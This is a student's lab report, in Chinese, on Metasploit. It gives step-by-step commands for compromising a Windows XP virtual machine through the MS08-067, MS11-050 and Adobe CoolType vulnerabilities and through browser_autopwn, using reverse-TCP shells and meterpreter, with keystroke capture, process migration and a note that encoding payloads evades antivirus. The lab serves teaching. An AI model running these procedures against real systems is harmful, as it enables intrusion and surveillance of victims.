20145227鄢曼君《网络对抗》MSF基础应用

主动攻击：ms08_067漏洞攻击实践

• 两台虚拟机，其中一台为kali，一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式，让两台虚拟机ping通。
• 在kali终端中开启msfconsole。
• 输入命令search ms08_067,会显示出找到的渗透模块:

• 输入命令use exploit/windows/smb/ms08_067_netapi，进入该漏洞模块的使用。
• 输入命令show payloads会显示出有效的攻击载荷，我们找到一个shell_reverse_tcp。

• 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
• 输入命令set LHOST "kali Ip" set RHOST "Win xp Ip"

• 使用命令show options查看payload状态。

• 输入命令exploit开始攻击，攻击成功。

• 在kali上执行ipconfig/all得到如下图所示：

• 在win xp上执行同样的命令，如下图所示：

• 可以发现二者结果相同，说明成功攻击。
• 还可以进行MS08_067远程漏洞攻击实践：meterpreter
• 前面都和上面的步骤相同。设置payload：set payload windows/meterpreter/reverse_tcp
• 输入命令exploit开始攻击，攻击成功。

对浏览器攻击：MS11_050漏洞渗透攻击实践

• 两台虚拟机相互ping通。
• kali中开启msfconsole。由于这次做的是ms11_050漏洞攻击，输入命令use windows/browser/ms11_050_mshtml_cobjectelement，使用该模块；info即可查看关于该漏洞的信息

• 设置相关信息:

• show options查看设置好的相关信息：

• exploit,靶机访问的ip地址如图：

• 在靶机IE上输入网址，并在靶机上查看信息。

• 查看kali，显示一个session 1已经创建：

• 输入命令sessions -i 1,开始连接:

• 攻击成功。可以进行一些操作，比如获取shell

• 或者进行按键抓取：

Adobe阅读器渗透攻击

• kali下打开显示隐藏文件。
• 在kali终端中开启msfconsole
• 输入命令use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块的使用。
• 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
• 设置相关数据：

• 使用命令show options，看是否设置成功。

• 输入exploit,生成pdf文件，并可以看到pdf所在文件夹，将pdf复制到靶机里。

• 使用back退出当前模块，并使用use exploit/multi/handler新建一个监听模块。
• 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。注意的是，这里需要输入命令set LPORT 5227和攻击模块里的数据设置为一样的。
• 使用命令exploit开始攻击，在xp中打开pdf。攻击成功结果如下图：

• 将进程迁移到explorer.exe.使用ps查看当前进程，并找到explorer.exe的进程号，如下图所示:

• 使用命令migrate 296 成功后输入shell，可查看xp靶机信息。还可进行一些操作。

• 在靶机xp中使用命令netstat -an,看本地tcp连接。发现成功连接。

辅助模块应用：使用浏览器渗透攻击server/browser_autopwn 模块

• browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时，它会自动攻击受害者的浏览器。在开始攻击之前，browser_autopwn 能够检测用户使用的浏览器类型，根据浏览器的检测结果，自行部署最合适的 exploit。
• 这是针对浏览器程序本身的渗透攻击，主要利用浏览器本身的漏洞，如 IE 浏览器，经常由于自身安全漏洞导致攻击者能够构造恶意网页进行渗透攻击。
• 打开终端窗口，启动msfconsole，选择 server/browser——autopwn 模块，配置 LHOST、 SRVHOST 为主控端 IP，设置 URIPATH 为 auto。最后运行run 。

• 之后 metasploit 会自动生成利用浏览器本身的一些典型漏洞的网页，此处生成了 20 个。

• 在靶机 IE 浏览器地址栏输入“http://LHOST:8080/auto”

• 攻击成功。查看检测结果，可以看到kali向靶机发送了很多数据包，用于检测该漏洞是否能利用，实际上靶机是打开了很多个网页,访问了产生的20个页面。

• 可以进行一些操作：

• 或者执行ipconfig命令:

问题回答

用自己的话解释什么是exploit,payload,encode.

• exploit就相当于是一个运载的工具，将负责攻击的代码传送到靶机中。
• payload也就是负责攻击的代码，之前我们实验就做过。
• encode也就是编码，它主要有两个功能，一是为了避免之前的payload中出现坏字符，二就是它要伪装从而实现免杀，不让杀毒软件很轻易的就发现payload是攻击代码。

实验体会

• 这次实验最大的感受就是电脑有一个大的内存条是多么重要。之前做的时候同时开两个虚拟机电脑卡的要死，做一晚上只能做一点点，时间都浪费在等电脑反应上了。后面换了一个大的内存条，实验就很顺畅了。然后这次实验老师要求至少有一个和别人不一样，我觉得这点非常好，让我们在做的过程中能更多的去思考，而不是完全照着别人的过一遍而不思考。还有一个感受就是我们这次实验攻击的靶机都是xp系统，漏洞都是很早之前的，要想攻击现在的电脑可就没有这么容易了。有点期待下一周的任务了，又会有什么不一样的呢？

20145227鄢曼君《网络对抗》MSF基础应用的更多相关文章

1. 20145227鄢曼君《网络对抗》Web安全基础实践

   20145227鄢曼君<网络对抗>Web安全基础实践 实验后回答问题 1.SQL注入攻击原理,如何防御? SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是 ...

2. 20145227鄢曼君《网络对抗》Web基础

   20145227鄢曼君<网络对抗>Web基础 实验内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建 ...

3. 20145227鄢曼君《网络对抗》逆向及Bof基础

   20145227鄢曼君<网络对抗>逆向及Bof基础 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任 ...

4. 20145227鄢曼君《网络对抗》shellcode注入&amp&semi;Return-to-libc攻击深入

   20145227鄢曼君<网络对抗>shellcode注入&Return-to-libc攻击深入 shellcode注入实践 shellcode基础知识 Shellcode实际是一段 ...

5. 网络对抗——web基础

   网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...

6. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

   2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

7. 2018-2019 20165221 网络对抗 Exp5 MSF基础

   2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

8. 2018-2019-2 20165325 《网络对抗技术》 Exp5：MSF基础应用

   2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...

9. 2018-2019 20165235 网络对抗 Exp5 MSF基础

   2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

随机推荐

1. JSON格式序列化与反序列化&lpar;List、XML&rpar;

   using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.I ...

2. Microsoft Web Platform Installer 5&period;0

   Microsoft Web Platform Installer 5.0 Web 平台安装器 https://www.microsoft.com/web/downloads/platform.aspx

3. 自定义WPF ListBox的选中项样式

   首先介绍一种简单地方法:就是通过自定义SystemColors类的参数来自定义WPF ListBox选择颜色的,SystemColors的HighlightBrushKey和HighlightText ...

4. 11&period;2Daily Scrum

   人员 任务分配完成情况 明天任务分配 王皓南 做文件的网页和数据库连接,任务编号771 实现视频上传的功能 申开亮 实现视频浏览的功能,任务编号772 实现视频浏览的功能 王宇杰 后台测试,任务编号7 ...

5. NPOI 2&period;0 教程（二）：编辑既存的EXCEL文件

   NPOI 2.0 教程(二):编辑既存的EXCEL文件 分类: C#技术 2014-03-11 15:40 993人阅读 评论(3) 收藏 举报 c#excelNPOI 转载请注明出处 http:// ...

6. tornado web高级开发项目

   抽屉官网:http://dig.chouti.com/ 一.配置(settings) settings = { 'template_path': 'views', #模板文件路径 'static_pa ...

7. git 提交解决冲突&lpar;转载&rpar;

   转载 git 提交解决冲突 http://www.cnblogs.com/qinbb/p/5972308.html   一:git命令在提交代码前,没有pull拉最新的代码,因此再次提交出现了冲突. ...

8. Runnable Callable及Future

   https://www.cnblogs.com/MOBIN/p/6185387.html

9. linux web服务基础知识&comma;dns

   #web服务基础知识c/s 客户端/服务器b/s 浏览器/服务器 nginx   >   web  server  服务端浏览器  >    web  client  客户端 #dns解析 ...

10. 32-java 里面list的问题

    申明一个对象时,一般前的类型需要申明的: List list1 = new ArrayList<Edge1>();    这个不能调用对象的属性 和 List<Edge1> l ...